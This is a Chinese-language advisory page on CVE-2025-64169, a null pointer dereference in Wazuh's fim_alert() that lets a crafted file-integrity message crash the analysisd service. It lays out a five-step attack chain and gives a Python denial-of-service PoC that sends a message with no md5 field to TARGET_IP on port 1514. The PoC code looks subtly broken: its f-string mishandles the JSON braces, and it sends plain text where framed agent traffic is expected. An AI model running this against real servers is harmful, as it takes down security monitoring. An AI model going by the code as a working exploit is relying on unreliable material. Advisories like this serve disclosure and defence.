CVE-2025-64169 CVSS 4.9 中危

CVE-2025-64169: Wazuh fim_alert()空指针解引用导致拒绝服务漏洞

披露日期: 2025-11-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-64169

漏洞类型

空指针解引用/拒绝服务

CVSS评分

4.9 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Wazuh

漏洞概述

Wazuh是一个免费开源的SIEM和威胁预防、检测和响应平台。从3.7.0到4.12.0之前的版本存在空指针解引用漏洞。fim_alert()函数在处理文件完整性监控告警时，没有正确验证oldsum->md5字段是否存在，导致攻击者可以利用特制的消息触发NULL指针解引用，造成analysisd服务崩溃，从而实现拒绝服务攻击。

技术细节

在Wazuh的FIM（文件完整性监控）模块中，fim_alert()函数负责处理文件变更告警。当代理发送文件变更信息时，服务器端会调用该函数进行验证和分析。问题出在函数直接访问oldsum->md5而未先检查oldsum指针本身或md5字段是否为NULL。攻击者可以通过伪造包含特定字段缺失的FIM消息来触发此漏洞，导致服务器进程崩溃。

攻击链分析

STEP 1

步骤1

攻击者获取Wazuh代理权限

STEP 2

步骤2

构造特制的FIM消息，md5字段缺失

STEP 3

步骤3

发送恶意消息到Wazuh服务器

STEP 4

步骤4

fim_alert()函数处理消息时触发NULL指针解引用

STEP 5

步骤5

analysisd服务崩溃，导致拒绝服务

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket
import struct

# Wazuh FIM消息构造
def create_fim_packet(filename, mtime):
    # 构造恶意FIM消息，md5字段缺失
    msg = f'{"filename":"{filename}","mtime":{mtime}}'
    return msg

# 连接到Wazuh manager
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('TARGET_IP', 1514))
sock.send(create_fim_packet('/etc/passwd', 1234567890))
sock.close()

影响范围

Wazuh >= 3.7.0 且 < 4.12.0

防御指南

临时缓解措施

如果无法立即升级，可通过防火墙限制代理通信，添加额外的输入验证层。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表